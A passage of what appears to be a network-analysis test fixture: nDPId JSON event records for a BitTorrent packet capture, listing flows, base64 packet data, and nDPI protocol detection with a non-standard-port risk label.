/\/\/\/v\/\/\/\/\/\/\/7\/\/\/\/7+\/+\/\/\/+\/\/\/\/\/v\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/8\/\/\/\/\/\/\/f\/\/\/\/3\/\/\/\/\/\/\/\/+AAAAABQQAAAI1AAAABQQAAAEuAAAABQQAAABqAAAABQQAAAE\/AAAABQQAAABtAAAABQQAAAKkAAAABQQAAAElAAAABQQAAAL5AAAABQQAAANYAAAABQQAAAA2AAAABQQAAAIPAAAABQQAAAJBAAAABQQAAAAOAAAABQQAAAMMAAAABQQAAAJ5AAAABQQAAAF6AAAABQQAAAJZAAAABQQAAAATAAAABQQAAAM4AAAABQQAAAItAAAABQQAAAHdAAAABQQAAAEPAAAABQQAAAMNAAAABQQAAABX"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455469975234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975234,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WJNAAEAGAADAqAEDlxpfHs6vWJEERbWJ8qKonIAYJJ+4TgAAAQEIChncDxURKgrLE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhul1XASmRgFxRA="} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455469975240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975240,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4VgZAAEAGAADAqAEDl0j\/o86w6hjbuZSz\/XvqFoAYKEhZAgAAAQEIChncDxoAaM\/9E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpHIptJ+s3GSLpo="} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975265,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4dKFAAEAGAADAqAEDTzXkAs6tOSO1PcfcBOlxsoAYN4r1TQAAAQEIChncDzIAAH\/nE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpuHBUmeY0dBAis="} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455469975295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1455469975295,"pkt":"xCwDBkn+LFbcjDU0CABFAACPKABAAHIGh9GXSP+jwKgBA+oYzrD9e+oW27mU94AYAQF3EQAAAQEICgBo0AMZ3A8aE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopW+kcQUcjSA5QoAAADnFABkMTplaTBlNDppcHY0NDqXSA=="} +00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455469975314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1455469975314,"pkt":"xCwDBkn+LFbcjDU0CABFAACdCeVAAHIGRpKXGl8ewKgBA1iRzq\/yoqicBEW1zYAYHVwArAAAAQEIChEqCxYZ3A8VE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coV7lk33H8ZRraqcAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVf"} +00991{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455469975341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":449,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":449,"pkt_l4_len":415,"thread_ts_msec":1455469975341,"pkt":"LFbcjDU0xCwDBkn+CABFAAGz+chAAEAGAADAqAEDUjrYc86rlaExvR16+FTQoYAY\/\/\/t\/gAAAQEIChncD3wAhEZHAAAA+hQAZDE6ZWkwZTQ6aXB2NDQ6UjfNATQ6aXB2NjE2Ov6AAAAAAAAAxiwD\/\/4GSf4xMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0MDk1OWU0OnJlcXFpMjU1ZTE6djE5OsK1VG9ycmVudCBNYWMgMS44LjY2OnlvdXJpcDQ6UjrYc2UAAAABDwAAAAMJn\/8AAAADFAMAAAAAAQIAAABlFAZkODptc2dfdHlwZWkwZTM6bnVtaTIwZTY6ZmlsdGVyNjQ6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGU="} +01314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455469975379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":600,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":600,"pkt_l4_len":566,"thread_ts_msec":1455469975379,"pkt":"xCwDBkn+LFbcjDU0CABFAAJKCedAAHIGROOXGl8ewKgBA1iRzq\/yoqkFBEW1zYAYHVwJbQAAAQEIChEqC1QZ3A9hYWdvaTJlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkyMjY3M2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTFlNjp5b3VyaXA0OlI3zQFlAAAAdAV\/v+\/\/f\/\/+\/\/\/\/\/\/\/\/\/\/fv\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/f\/\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/7\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/f\/\/\/\/7\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/9\/9\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/ff+AAAAABQQAAAC+AAAABQQAAAB0AAAABQQAAAJcAAAABQQAAAOGAAAABQQAAAEaAAAABQQAAAA3AAAABQQAAAL2AAAABQQAAAOAAAAABQQAAAGXAAAABQQAAALiAAAABQQAAAIeAAAABQQAAAFXAAAABQQAAAJLAAAABQQAAAB7AAAABQQAAAI\/AAAABQQAAADyAAAABQQAAAAAAAAABQQAAAAgAAAABQQAAAH+AAAABQQAAANsAAAABQQAAAATAAAABQQAAALWAAAABQQAAAAJAAAABQQAAAGq"} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455469975393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1455469975393,"pkt":"LFbcjDU0xCwDBkn+CABFAADeIplAAEAGAADAqAEDl0j\/o86w6hjbuZVQ\/XvsloAYKDdZaAAAAQEIChncD64AaNAEMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEyOnV0X3JlY29tbWVuZGk1ZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0OpdI\/6NlAAAAAQ8="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975407,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4fvZAAEAGAADAqAEDeD4h8c6umaQbpzY0C9TW44AYjjZcRQAAAQEIChncD7sAQ+m5E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhq4aGFIV+2F24M="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975622,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4JlBAAEAGAADAqAEDTzeBFs6sL0FM+lulp3q\/xoAYVhCSYwAAAQEIChncEJACXeJGE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsY\/A3YcaePRRY8="} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1455469976336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976336,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4SfNAAEAGAADAqAEDxmSSCc6z6wOon+tuBozVl4AYZVEahAAAAQEIChncE1MB8nMrE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkC3tYvcSfI56Y="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1455469976513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469976513,"pkt":"xCwDBkn+LFbcjDU0CABFEACEZqRAAHYGg6bGZJIJwKgBA+sDzrMGjNWXqJ\/rsoAYAQLT1gAAAQEICgHycz0Z3BNTE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wokMyLr47j7jk1aEAAADnFABkMTplaTA="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1455469976582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976582,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4BctAAEAGAADAqAEDvmfDOM6ytinSUvXkM6bvoIAY+3dDtgAAAQEIChncFEcAv3iAE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkKv+eYrLs2+ChY="} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +01351{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1455469976697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"thread_ts_msec":1455469976697,"pkt":"xCwDBkn+LFbcjDU0CABFEAJjaOxAAHYGf3\/GZJIJwKgBA+sDzrMGjNXnqJ\/rsoAYAQJs0QAAAQEICgHyc00Z3BQDZTQ6aXB2NDQ6xmSSCTEyOmNvbXBsZXRlX2Fnb2kxZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTE1ZTY6eW91cmlwNDpSN80BZQAAAHQFv\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/f\/\/\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/f\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/9\/\/\/\/\/\/7\/\/\/7\/+7\/\/f\/3\/f\/\/\/\/v\/\/\/\/\/\/\/9\/9\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/3\/\/\/\/gAAAAAUEAAAClgAAAAUEAAAA6gAAAAUEAAAAugAAAAUEAAAA4AAAAAUEAAABqgAAAAUEAAACZwAAAAUEAAACTwAAAAUEAAAC8gAAAAUEAAABiQAAAAUEAAAB3QAAAAUEAAADdAAAAAUEAAAC\/gAAAAUEAAACJgAAAAUEAAACiAAAAAUEAAACvwAAAAUEAAACeQAAAAUEAAABRQAAAAUEAAACCwAAAAUEAAAAkgAAAAUEAAACdQAAAAUEAAACoAAAAAUEAAAAAQAAAAUEAAAAFAAAAAUEAAADTw=="} +00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1455469977023,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1455469977023,"pkt":"xCwDBkn+LFbcjDU0CABFAACFWMJAAHMGa2W+Z8M4wKgBA7YpzrIzpu+g0lL2KIAYAQKm2wAAAQEICgC\/ehQZ3BRHE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xovjV8bH+iIGCHSYAAAEBFABkMTplaTBl"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1455469977229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469977229,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4L\/xAAEAGAADAqAEDlw8wvc61t5l0EJCE2E\/BJoAYIPWJ4gAAAQEIChncFslLXJigE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjv4JZL7rS4V2Vgo="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 